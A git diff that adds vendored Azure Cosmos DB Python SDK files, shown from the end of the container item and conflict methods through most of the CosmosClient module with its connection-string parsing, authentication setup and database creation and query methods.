`query`. + + You can use any value for the container name in the FROM clause, but + often the container name is used. In the examples below, the container + name is "products," and is aliased as "p" for easier referencing in + the WHERE clause. + + :param query: The Azure Cosmos DB SQL query to execute. + :param parameters: Optional array of parameters to the query. + Each parameter is a dict() with 'name' and 'value' keys. + Ignored if no query is provided. + :param partition_key: Specifies the partition key value for the item. + :param enable_cross_partition_query: Allows sending of more than one request to + execute the query in the Azure Cosmos DB service. + More than one request is necessary if the query is not scoped to single partition key value. + :param max_item_count: Max number of items to be returned in the enumeration operation. + :param enable_scan_in_query: Allow scan on the queries which couldn't be served as + indexing was opted out on the requested paths. + :param populate_query_metrics: Enable returning query metrics in response headers. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword Callable response_hook: A callable invoked with the response metadata. + **Provisional** keyword argument max_integrated_cache_staleness_in_ms + :keyword int max_integrated_cache_staleness_in_ms: + The max cache staleness for the integrated cache in milliseconds. + For accounts configured to use the integrated cache, using Session or Eventual consistency, + responses are guaranteed to be no staler than this value. + :returns: An Iterable of items (dicts). + :rtype: ItemPaged[Dict[str, Any]] + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples.py + :start-after: [START query_items] + :end-before: [END query_items] + :language: python + :dedent: 0 + :caption: Get all products that have not been discontinued: + :name: query_items + + .. literalinclude:: ../samples/examples.py + :start-after: [START query_items_param] + :end-before: [END query_items_param] + :language: python + :dedent: 0 + :caption: Parameterized query to get all products that have been discontinued: + :name: query_items_param + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if enable_cross_partition_query is not None: + feed_options["enableCrossPartitionQuery"] = enable_cross_partition_query + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + if populate_query_metrics is not None: + feed_options["populateQueryMetrics"] = populate_query_metrics + if partition_key is not None: + feed_options["partitionKey"] = self._set_partition_key(partition_key) + if enable_scan_in_query is not None: + feed_options["enableScanInQuery"] = enable_scan_in_query + max_integrated_cache_staleness_in_ms = kwargs.pop('max_integrated_cache_staleness_in_ms', None) + if max_integrated_cache_staleness_in_ms: + validate_cache_staleness_value(max_integrated_cache_staleness_in_ms) + feed_options["maxIntegratedCacheStaleness"] = max_integrated_cache_staleness_in_ms + + if hasattr(response_hook, "clear"): + response_hook.clear() + + items = self.client_connection.QueryItems( + database_or_container_link=self.container_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + partition_key=partition_key, + response_hook=response_hook, + **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, items) + return items + + @distributed_trace + def replace_item( + self, + item, # type: Union[str, Dict[str, Any]] + body, # type: Dict[str, Any] + populate_query_metrics=None, # type: Optional[bool] + pre_trigger_include=None, # type: Optional[str] + post_trigger_include=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> Dict[str, Any] + """Replaces the specified item if it exists in the container. + + If the item does not already exist in the container, an exception is raised. + + :param item: The ID (name) or dict representing item to be replaced. + :param body: A dict-like object representing the item to replace. + :param pre_trigger_include: trigger id to be used as pre operation trigger. + :param post_trigger_include: trigger id to be used as post operation trigger. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: A dict representing the item after replace went through. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The replace failed or the item with + given id does not exist. + :rtype: dict[str, Any] + """ + item_link = self._get_document_link(item) + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + request_options["disableAutomaticIdGeneration"] = True + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + request_options["populateQueryMetrics"] = populate_query_metrics + if pre_trigger_include is not None: + request_options["preTriggerInclude"] = pre_trigger_include + if post_trigger_include is not None: + request_options["postTriggerInclude"] = post_trigger_include + + result = self.client_connection.ReplaceItem( + document_link=item_link, new_document=body, options=request_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def upsert_item( + self, + body, # type: Dict[str, Any] + populate_query_metrics=None, # type: Optional[bool] + pre_trigger_include=None, # type: Optional[str] + post_trigger_include=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> Dict[str, Any] + """Insert or update the specified item. + + If the item already exists in the container, it is replaced. If the item + does not already exist, it is inserted. + + :param body: A dict-like object representing the item to update or insert. + :param pre_trigger_include: trigger id to be used as pre operation trigger. + :param post_trigger_include: trigger id to be used as post operation trigger. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: A dict representing the upserted item. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The given item could not be upserted. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + request_options["disableAutomaticIdGeneration"] = True + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + request_options["populateQueryMetrics"] = populate_query_metrics + if pre_trigger_include is not None: + request_options["preTriggerInclude"] = pre_trigger_include + if post_trigger_include is not None: + request_options["postTriggerInclude"] = post_trigger_include + + result = self.client_connection.UpsertItem( + database_or_container_link=self.container_link, + document=body, + options=request_options, + **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def create_item( + self, + body, # type: Dict[str, Any] + populate_query_metrics=None, # type: Optional[bool] + pre_trigger_include=None, # type: Optional[str] + post_trigger_include=None, # type: Optional[str] + indexing_directive=None, # type: Optional[Any] + **kwargs # type: Any + ): + # type: (...) -> Dict[str, Any] + """Create an item in the container. + + To update or replace an existing item, use the + :func:`ContainerProxy.upsert_item` method. + + :param body: A dict-like object representing the item to create. + :param pre_trigger_include: trigger id to be used as pre operation trigger. + :param post_trigger_include: trigger id to be used as post operation trigger. + :param indexing_directive: Indicate whether the document should be omitted from indexing. + :keyword bool enable_automatic_id_generation: Enable automatic id generation if no id present. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: A dict representing the new item. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: Item with the given ID already exists. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + request_options["disableAutomaticIdGeneration"] = not kwargs.pop('enable_automatic_id_generation', False) + if populate_query_metrics: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + request_options["populateQueryMetrics"] = populate_query_metrics + if pre_trigger_include is not None: + request_options["preTriggerInclude"] = pre_trigger_include + if post_trigger_include is not None: + request_options["postTriggerInclude"] = post_trigger_include + if indexing_directive is not None: + request_options["indexingDirective"] = indexing_directive + + result = self.client_connection.CreateItem( + database_or_container_link=self.container_link, document=body, options=request_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def delete_item( + self, + item, # type: Union[Dict[str, Any], str] + partition_key, # type: Any + populate_query_metrics=None, # type: Optional[bool] + pre_trigger_include=None, # type: Optional[str] + post_trigger_include=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> None + """Delete the specified item from the container. + + If the item does not already exist in the container, an exception is raised. + + :param item: The ID (name) or dict representing item to be deleted. + :param partition_key: Specifies the partition key value for the item. + :param pre_trigger_include: trigger id to be used as pre operation trigger. + :param post_trigger_include: trigger id to be used as post operation trigger. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag. + :keyword Callable response_hook: A callable invoked with the response metadata. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The item wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The item does not exist in the container. + :rtype: None + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if partition_key is not None: + request_options["partitionKey"] = self._set_partition_key(partition_key) + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + request_options["populateQueryMetrics"] = populate_query_metrics + if pre_trigger_include is not None: + request_options["preTriggerInclude"] = pre_trigger_include + if post_trigger_include is not None: + request_options["postTriggerInclude"] = post_trigger_include + + document_link = self._get_document_link(item) + result = self.client_connection.DeleteItem(document_link=document_link, options=request_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + + @distributed_trace + def read_offer(self, **kwargs): + # type: (Any) -> Offer + """Get the ThroughputProperties object for this container. + If no ThroughputProperties already exist for the container, an exception is raised. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: Throughput for the container. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: No throughput properties exists for the container or + the throughput properties could not be retrieved. + :rtype: ~azure.cosmos.ThroughputProperties + """ + warnings.warn( + "read_offer is a deprecated method name, use get_throughput instead", + DeprecationWarning + ) + return self.get_throughput(**kwargs) + + @distributed_trace + def get_throughput(self, **kwargs): + # type: (Any) -> ThroughputProperties + """Get the ThroughputProperties object for this container. + + If no ThroughputProperties already exist for the container, an exception is raised. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: Throughput for the container. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: No throughput properties exists for the container or + the throughput properties could not be retrieved. + :rtype: ~azure.cosmos.ThroughputProperties + """ + response_hook = kwargs.pop('response_hook', None) + properties = self._get_properties() + link = properties["_self"] + query_spec = { + "query": "SELECT * FROM root r WHERE r.resource=@link", + "parameters": [{"name": "@link", "value": link}], + } + throughput_properties = list(self.client_connection.QueryOffers(query_spec, **kwargs)) + if not throughput_properties: + raise CosmosResourceNotFoundError( + status_code=StatusCodes.NOT_FOUND, + message="Could not find ThroughputProperties for container " + self.container_link) + + if response_hook: + response_hook(self.client_connection.last_response_headers, throughput_properties) + + return ThroughputProperties(offer_throughput=throughput_properties[0]["content"]["offerThroughput"], + properties=throughput_properties[0]) + + @distributed_trace + def replace_throughput(self, throughput, **kwargs): + # type: (int, Any) -> ThroughputProperties + """Replace the container's throughput. + + If no ThroughputProperties already exist for the container, an exception is raised. + + :param throughput: The throughput to be set (an integer). + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: ThroughputProperties for the container, updated with new throughput. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: No throughput properties exist for the container + or the throughput properties could not be updated. + :rtype: ~azure.cosmos.ThroughputProperties + """ + response_hook = kwargs.pop('response_hook', None) + properties = self._get_properties() + link = properties["_self"] + query_spec = { + "query": "SELECT * FROM root r WHERE r.resource=@link", + "parameters": [{"name": "@link", "value": link}], + } + throughput_properties = list(self.client_connection.QueryOffers(query_spec, **kwargs)) + if not throughput_properties: + raise CosmosResourceNotFoundError( + status_code=StatusCodes.NOT_FOUND, + message="Could not find Offer for container " + self.container_link) + new_throughput_properties = throughput_properties[0].copy() + new_throughput_properties["content"]["offerThroughput"] = throughput + data = self.client_connection.ReplaceOffer( + offer_link=throughput_properties[0]["_self"], offer=throughput_properties[0], **kwargs) + + if response_hook: + response_hook(self.client_connection.last_response_headers, data) + + return ThroughputProperties(offer_throughput=data["content"]["offerThroughput"], properties=data) + + @distributed_trace + def list_conflicts(self, max_item_count=None, **kwargs): + # type: (Optional[int], Any) -> Iterable[Dict[str, Any]] + """List all the conflicts in the container. + + :param max_item_count: Max number of items to be returned in the enumeration operation. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: An Iterable of conflicts (dicts). + :rtype: Iterable[dict[str, Any]] + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + result = self.client_connection.ReadConflicts( + collection_link=self.container_link, feed_options=feed_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def query_conflicts( + self, + query, # type: str + parameters=None, # type: Optional[List[str]] + enable_cross_partition_query=None, # type: Optional[bool] + partition_key=None, # type: Optional[Any] + max_item_count=None, # type: Optional[int] + **kwargs # type: Any + ): + # type: (...) -> Iterable[Dict[str, Any]] + """Return all conflicts matching a given `query`. + + :param query: The Azure Cosmos DB SQL query to execute. + :param parameters: Optional array of parameters to the query. Ignored if no query is provided. + :param enable_cross_partition_query: Allows sending of more than one request to execute + the query in the Azure Cosmos DB service. + More than one request is necessary if the query is not scoped to single partition key value. + :param partition_key: Specifies the partition key value for the item. + :param max_item_count: Max number of items to be returned in the enumeration operation. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: An Iterable of conflicts (dicts). + :rtype: Iterable[dict[str, Any]] + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + if enable_cross_partition_query is not None: + feed_options["enableCrossPartitionQuery"] = enable_cross_partition_query + if partition_key is not None: + feed_options["partitionKey"] = self._set_partition_key(partition_key) + + result = self.client_connection.QueryConflicts( + collection_link=self.container_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def get_conflict(self, conflict, partition_key, **kwargs): + # type: (Union[str, Dict[str, Any]], Any, Any) -> Dict[str, Any] + """Get the conflict identified by `conflict`. + + :param conflict: The ID (name) or dict representing the conflict to retrieve. + :param partition_key: Partition key for the conflict to retrieve. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: A dict representing the retrieved conflict. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The given conflict couldn't be retrieved. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if partition_key is not None: + request_options["partitionKey"] = self._set_partition_key(partition_key) + + result = self.client_connection.ReadConflict( + conflict_link=self._get_conflict_link(conflict), options=request_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def delete_conflict(self, conflict, partition_key, **kwargs): + # type: (Union[str, Dict[str, Any]], Any, Any) -> None + """Delete a specified conflict from the container. + + If the conflict does not already exist in the container, an exception is raised. + + :param conflict: The ID (name) or dict representing the conflict to be deleted. + :param partition_key: Partition key for the conflict to delete. + :keyword Callable response_hook: A callable invoked with the response metadata. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The conflict wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The conflict does not exist in the container. + :rtype: None + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if partition_key is not None: + request_options["partitionKey"] = self._set_partition_key(partition_key) + + result = self.client_connection.DeleteConflict( + conflict_link=self._get_conflict_link(conflict), options=request_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/cosmos_client.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/cosmos_client.py new file mode 100644 index 0000000..18bed1f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/cosmos_client.py @@ -0,0 +1,478 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Create, read, and delete databases in the Azure Cosmos DB SQL API service. +""" + +from typing import Any, Dict, Optional, Union, cast, Iterable, List # pylint: disable=unused-import +import warnings +from azure.core.tracing.decorator import distributed_trace # type: ignore + +from ._cosmos_client_connection import CosmosClientConnection +from ._base import build_options +from ._retry_utility import ConnectionRetryPolicy +from .database import DatabaseProxy +from .documents import ConnectionPolicy, DatabaseAccount +from .exceptions import CosmosResourceNotFoundError + +__all__ = ("CosmosClient",) + + +def _parse_connection_str(conn_str, credential): + # type: (str, Optional[Any]) -> Dict[str, str] + conn_str = conn_str.rstrip(";") + conn_settings = dict( # type: ignore # pylint: disable=consider-using-dict-comprehension + s.split("=", 1) for s in conn_str.split(";") + ) + if 'AccountEndpoint' not in conn_settings: + raise ValueError("Connection string missing setting 'AccountEndpoint'.") + if not credential and 'AccountKey' not in conn_settings: + raise ValueError("Connection string missing setting 'AccountKey'.") + return conn_settings + + +def _build_auth(credential): + # type: (Any) -> Dict[str, Any] + auth = {} + if isinstance(credential, str): + auth['masterKey'] = credential + elif isinstance(credential, dict): + if any(k for k in credential.keys() if k in ['masterKey', 'resourceTokens', 'permissionFeed']): + return credential # Backwards compatible + auth['resourceTokens'] = credential # type: ignore + elif hasattr(credential, '__iter__'): + auth['permissionFeed'] = credential + elif hasattr(credential, 'get_token'): + auth['clientSecretCredential'] = credential + else: + raise TypeError( + "Unrecognized credential type. Please supply the master key as a string " + "or a dictionary, or resource tokens, or a list of permissions, or any instance of a class implementing" + " TokenCredential (see azure.identity module for specific implementations such as ClientSecretCredential).") + return auth + + +def _build_connection_policy(kwargs): + # type: (Dict[str, Any]) -> ConnectionPolicy + # pylint: disable=protected-access + policy = kwargs.pop('connection_policy', None) or ConnectionPolicy() + + # Connection config + policy.RequestTimeout = kwargs.pop('request_timeout', None) or \ + kwargs.pop('connection_timeout', None) or \ + policy.RequestTimeout + policy.ConnectionMode = kwargs.pop('connection_mode', None) or policy.ConnectionMode + policy.ProxyConfiguration = kwargs.pop('proxy_config', None) or policy.ProxyConfiguration + policy.EnableEndpointDiscovery = kwargs.pop('enable_endpoint_discovery') \ + if 'enable_endpoint_discovery' in kwargs.keys() else policy.EnableEndpointDiscovery + policy.PreferredLocations = kwargs.pop('preferred_locations', None) or policy.PreferredLocations + policy.UseMultipleWriteLocations = kwargs.pop('multiple_write_locations', None) or \ + policy.UseMultipleWriteLocations + + # SSL config + verify = kwargs.pop('connection_verify', None) + policy.DisableSSLVerification = not bool(verify if verify is not None else True) + ssl = kwargs.pop('ssl_config', None) or policy.SSLConfiguration + if ssl: + ssl.SSLCertFile = kwargs.pop('connection_cert', None) or ssl.SSLCertFile + ssl.SSLCaCerts = verify or ssl.SSLCaCerts + policy.SSLConfiguration = ssl + + # Retry config + retry_options = kwargs.pop('retry_options', None) + if retry_options is not None: + warnings.warn("This option has been deprecated and will be removed from the SDK in a future release.", + DeprecationWarning) + retry_options = policy.RetryOptions + total_retries = kwargs.pop('retry_total', None) + retry_options._max_retry_attempt_count = total_retries or retry_options._max_retry_attempt_count + retry_options._fixed_retry_interval_in_milliseconds = kwargs.pop('retry_fixed_interval', None) or \ + retry_options._fixed_retry_interval_in_milliseconds + max_backoff = kwargs.pop('retry_backoff_max', None) + retry_options._max_wait_time_in_seconds = max_backoff or retry_options._max_wait_time_in_seconds + policy.RetryOptions = retry_options + connection_retry = kwargs.pop('connection_retry_policy', None) + if connection_retry is not None: + warnings.warn("This option has been deprecated and will be removed from the SDK in a future release.", + DeprecationWarning) + connection_retry = policy.ConnectionRetryConfiguration + if not connection_retry: + connection_retry = ConnectionRetryPolicy( + retry_total=total_retries, + retry_connect=kwargs.pop('retry_connect', None), + retry_read=kwargs.pop('retry_read', None), + retry_status=kwargs.pop('retry_status', None), + retry_backoff_max=max_backoff, + retry_on_status_codes=kwargs.pop('retry_on_status_codes', []), + retry_backoff_factor=kwargs.pop('retry_backoff_factor', 0.8), + ) + policy.ConnectionRetryConfiguration = connection_retry + + return policy + + +class CosmosClient(object): # pylint: disable=client-accepts-api-version-keyword + """A client-side logical representation of an Azure Cosmos DB account. + + Use this client to configure and execute requests to the Azure Cosmos DB service. + + :param str url: The URL of the Cosmos DB account. + :param credential: Can be the account key, or a dictionary of resource tokens. + :type credential: Union[str, Dict[str, str], ~azure.core.credentials.TokenCredential] + :param str consistency_level: Consistency level to use for the session. The default value is None (Account level). + :keyword int timeout: An absolute timeout in seconds, for the combined HTTP request and response processing. + :keyword int request_timeout: The HTTP request timeout in milliseconds. + :keyword str connection_mode: The connection mode for the client - currently only supports 'Gateway'. + :keyword proxy_config: Connection proxy configuration. + :paramtype proxy_config: ~azure.cosmos.ProxyConfiguration + :keyword ssl_config: Connection SSL configuration. + :paramtype ssl_config: ~azure.cosmos.SSLConfiguration + :keyword bool connection_verify: Whether to verify the connection, default value is True. + :keyword str connection_cert: An alternative certificate to verify the connection. + :keyword int retry_total: Maximum retry attempts. + :keyword int retry_backoff_max: Maximum retry wait time in seconds. + :keyword int retry_fixed_interval: Fixed retry interval in milliseconds. + :keyword int retry_read: Maximum number of socket read retry attempts. + :keyword int retry_connect: Maximum number of connection error retry attempts. + :keyword int retry_status: Maximum number of retry attempts on error status codes. + :keyword list[int] retry_on_status_codes: A list of specific status codes to retry on. + :keyword float retry_backoff_factor: Factor to calculate wait time between retry attempts. + :keyword bool enable_endpoint_discovery: Enable endpoint discovery for + geo-replicated database accounts. (Default: True) + :keyword list[str] preferred_locations: The preferred locations for geo-replicated database accounts. + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples.py + :start-after: [START create_client] + :end-before: [END create_client] + :language: python + :dedent: 0 + :caption: Create a new instance of the Cosmos DB client: + :name: create_client + """ + + def __init__(self, url, credential, consistency_level=None, **kwargs): + # type: (str, Any, Optional[str], Any) -> None + """Instantiate a new CosmosClient.""" + auth = _build_auth(credential) + connection_policy = _build_connection_policy(kwargs) + self.client_connection = CosmosClientConnection( + url, auth=auth, consistency_level=consistency_level, connection_policy=connection_policy, **kwargs + ) + + def __repr__(self): # pylint:disable=client-method-name-no-double-underscore + # type () -> str + return "".format(self.client_connection.url_connection)[:1024] + + def __enter__(self): + self.client_connection.pipeline_client.__enter__() + return self + + def __exit__(self, *args): + return self.client_connection.pipeline_client.__exit__(*args) + + @classmethod + def from_connection_string(cls, conn_str, credential=None, consistency_level=None, **kwargs): + # type: (str, Optional[Any], Optional[str], Any) -> CosmosClient + """Create a CosmosClient instance from a connection string. + + This can be retrieved from the Azure portal.For full list of optional + keyword arguments, see the CosmosClient constructor. + + :param str conn_str: The connection string. + :param credential: Alternative credentials to use instead of the key + provided in the connection string. + :type credential: str or dict(str, str) + :param Optional[str] consistency_level: + Consistency level to use for the session. The default value is None (Account level). + """ + settings = _parse_connection_str(conn_str, credential) + return cls( + url=settings['AccountEndpoint'], + credential=credential or settings['AccountKey'], + consistency_level=consistency_level, + **kwargs + ) + + @staticmethod + def _get_database_link(database_or_id): + # type: (Union[DatabaseProxy, str, Dict[str, str]]) -> str + if isinstance(database_or_id, str): + return "dbs/{}".format(database_or_id) + try: + return cast("DatabaseProxy", database_or_id).database_link + except AttributeError: + pass + database_id = cast("Dict[str, str]", database_or_id)["id"] + return "dbs/{}".format(database_id) + + @distributed_trace + def create_database( # pylint: disable=redefined-builtin + self, + id, # type: str + populate_query_metrics=None, # type: Optional[bool] + offer_throughput=None, # type: Optional[int] + **kwargs # type: Any + ): + # type: (...) -> DatabaseProxy + """ + Create a new database with the given ID (name). + + :param id: ID (name) of the database to create. + :param int offer_throughput: The provisioned throughput for this offer. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: A DatabaseProxy instance representing the new database. + :rtype: ~azure.cosmos.DatabaseProxy + :raises ~azure.cosmos.exceptions.CosmosResourceExistsError: Database with the given ID already exists. + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples.py + :start-after: [START create_database] + :end-before: [END create_database] + :language: python + :dedent: 0 + :caption: Create a database in the Cosmos DB account: + :name: create_database + """ + + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + request_options["populateQueryMetrics"] = populate_query_metrics + if offer_throughput is not None: + request_options["offerThroughput"] = offer_throughput + + result = self.client_connection.CreateDatabase(database=dict(id=id), options=request_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers) + return DatabaseProxy(self.client_connection, id=result["id"], properties=result) + + @distributed_trace + def create_database_if_not_exists( # pylint: disable=redefined-builtin + self, + id, # type: str + populate_query_metrics=None, # type: Optional[bool] + offer_throughput=None, # type: Optional[int] + **kwargs # type: Any + ): + # type: (...) -> DatabaseProxy + """ + Create the database if it does not exist already. + + If the database already exists, the existing settings are returned. + + ..note:: + This function does not check or update existing database settings or + offer throughput if they differ from what is passed in. + + :param id: ID (name) of the database to read or create. + :param bool populate_query_metrics: Enable returning query metrics in response headers. + :param int offer_throughput: The provisioned throughput for this offer. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: A DatabaseProxy instance representing the database. + :rtype: ~azure.cosmos.DatabaseProxy + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The database read or creation failed. + """ + try: + database_proxy = self.get_database_client(id) + database_proxy.read( + populate_query_metrics=populate_query_metrics, + **kwargs + ) + return database_proxy + except CosmosResourceNotFoundError: + return self.create_database( + id, + populate_query_metrics=populate_query_metrics, + offer_throughput=offer_throughput, + **kwargs + ) + + def get_database_client(self, database): + # type: (Union[str, DatabaseProxy, Dict[str, Any]]) -> DatabaseProxy + """Retrieve an existing database with the ID (name) `id`. + + :param database: The ID (name), dict representing the properties or + `DatabaseProxy` instance of the database to read. + :type database: str or dict(str, str) or ~azure.cosmos.DatabaseProxy + :returns: A `DatabaseProxy` instance representing the retrieved database. + :rtype: ~azure.cosmos.DatabaseProxy + """ + if isinstance(database, DatabaseProxy): + id_value = database.id + else: + try: + id_value = database["id"] + except TypeError: + id_value = database + + return DatabaseProxy(self.client_connection, id_value) + + @distributed_trace + def list_databases( + self, + max_item_count=None, # type: Optional[int] + populate_query_metrics=None, # type: Optional[bool] + **kwargs # type: Any + ): + # type: (...) -> Iterable[Dict[str, Any]] + """List the databases in a Cosmos DB SQL database account. + + :param int max_item_count: Max number of items to be returned in the enumeration operation. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: An Iterable of database properties (dicts). + :rtype: Iterable[dict[str, str]] + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + feed_options["populateQueryMetrics"] = populate_query_metrics + + result = self.client_connection.ReadDatabases(options=feed_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers) + return result + + @distributed_trace + def query_databases( + self, + query=None, # type: Optional[str] + parameters=None, # type: Optional[List[str]] + enable_cross_partition_query=None, # type: Optional[bool] + max_item_count=None, # type: Optional[int] + populate_query_metrics=None, # type: Optional[bool] + **kwargs # type: Any + ): + # type: (...) -> Iterable[Dict[str, Any]] + """Query the databases in a Cosmos DB SQL database account. + + :param str query: The Azure Cosmos DB SQL query to execute. + :param list[str] parameters: Optional array of parameters to the query. Ignored if no query is provided. + :param bool enable_cross_partition_query: Allow scan on the queries which couldn't be + served as indexing was opted out on the requested paths. + :param int max_item_count: Max number of items to be returned in the enumeration operation. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: An Iterable of database properties (dicts). + :rtype: Iterable[dict[str, str]] + """ + feed_options = build_options(kwargs) + response_hook 